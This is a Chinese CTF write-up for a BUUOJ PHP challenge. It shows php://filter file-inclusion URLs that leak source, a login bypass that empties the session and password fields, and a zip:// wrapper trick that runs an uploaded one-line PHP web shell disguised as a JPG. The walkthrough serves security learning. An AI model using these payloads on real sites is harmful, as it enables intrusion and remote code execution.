[极客大挑战2020]Roamphp2-Myblog
1
2
3
| http://f06f114c-1b2c-456c-b303-0af13da7fd8a.node5.buuoj.cn:81/index.php?page=php://filter/convert.base64-encode/resource=secret
http://f06f114c-1b2c-456c-b303-0af13da7fd8a.node5.buuoj.cn:81/index.php?page=php://filter/convert.base64-encode/resource=login
http://f06f114c-1b2c-456c-b303-0af13da7fd8a.node5.buuoj.cn:81/index.php?page=php://filter/convert.base64-encode/resource=home
|
login.php:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
| <?php
require_once("secret.php");
mt_srand($secret_seed);
$_SESSION['password'] = mt_rand();
?>
<?php
error_reporting(0);
session_start();
$logined = false;
if (isset($_POST['username']) and isset($_POST['password'])){
if ($_POST['username'] === "Longlone" and $_POST['password'] == $_SESSION['password']){
$logined = true;
$_SESSION['status'] = $logined;
}
}
if ($logined === false && !isset($_SESSION['status']) || $_SESSION['status'] !== true){
echo "<script>alert('username or password not correct!');window.location.href='index.php?page=login';</script>";
die();
}
?>
<?php
if(isset($_FILES['Files']) and $_SESSION['status'] === true){
$tmp_file = $_FILES['Files']['name'];
$tmp_path = $_FILES['Files']['tmp_name'];
if(($extension = pathinfo($tmp_file)['extension']) != ""){
$allows = array('gif','jpeg','jpg','png');
if(in_array($extension,$allows,true) and in_array($_FILES['Files']['type'],array_map(function($ext){return 'image/'.$ext;},$allows),true)){
$upload_name = sha1(md5(uniqid(microtime(true), true))).'.'.$extension;
move_uploaded_file($tmp_path,"assets/img/upload/".$upload_name);
echo "<script>alert('Update image -> assets/img/upload/${upload_name}') </script>";
} else {
echo "<script>alert('Update illegal! Only allows like \'gif\', \'jpeg\', \'jpg\', \'png\' ') </script>";
}
}
}
?>
|
secret.php:
1
2
3
| <?php
$secret_seed = mt_rand();
?>
|
password
丢掉html的东西,php代码都在这,一个是文件上传的,一个是登录验证的
先是登陆验证:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
| <?php
error_reporting(0);
session_start();
$logined = false;
if (isset($_POST['username']) and isset($_POST['password'])){
if ($_POST['username'] === "Longlone" and $_POST['password'] == $_SESSION['password']){
$logined = true;
$_SESSION['status'] = $logined;
}
}
if ($logined === false && !isset($_SESSION['status']) || $_SESSION['status'] !== true){
echo "<script>alert('username or password not correct!');window.location.href='index.php?page=login';</script>";
die();
}
?>
|
这个就是$_POST[‘password’] == $_SESSION[‘password’],很简单,我把post的密码和session密码是等于sessionid的都置为空就不行了,直接开始,然后有个问题就是必须填密码:
将required这个东西在密码那里的删了就行(前端)
直接登录:
文件上传代码:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
| <?php
if(isset($_FILES['Files']) and $_SESSION['status'] === true){
$tmp_file = $_FILES['Files']['name'];
$tmp_path = $_FILES['Files']['tmp_name'];
if(($extension = pathinfo($tmp_file)['extension']) != ""){
$allows = array('gif','jpeg','jpg','png');
if(in_array($extension,$allows,true) and in_array($_FILES['Files']['type'],array_map(function($ext){return 'image/'.$ext;},$allows),true)){
$upload_name = sha1(md5(uniqid(microtime(true), true))).'.'.$extension;
move_uploaded_file($tmp_path,"assets/img/upload/".$upload_name);
echo "<script>alert('Update image -> assets/img/upload/${upload_name}') </script>";
} else {
echo "<script>alert('Update illegal! Only allows like \'gif\', \'jpeg\', \'jpg\', \'png\' ') </script>";
}
}
}
?>
|
这个就是gif jpeg,jpg,png上传,学了一招就是文件1.php压缩1.zip改成jpg文件上传再用zip协议解压1.php使一句话木马获取shell
然后利用zip伪协议读取一下,格式如下:
1
2
3
4
| zip:// + zip路径 + %23 + php文件名 (由于#在get请求中会将后面的参数忽略所以使用get请求时候应进行url编码为%23)
http://e65d13a1-5f44-40f0-95cc-fe32a9a1c6be.node5.buuoj.cn:81/?page=zip://./assets/img/upload/bad7151866a0d455db50abc8edf6f70978b1b573.jpg%231
这里不加.php后缀是因为在index.php包含的时候默认加上了,还要注意zip协议后面跟的是./因为没有去看绝对路径。
|
基本就有了
参考链接:https://blog.csdn.net/m0_56059226/article/details/119758074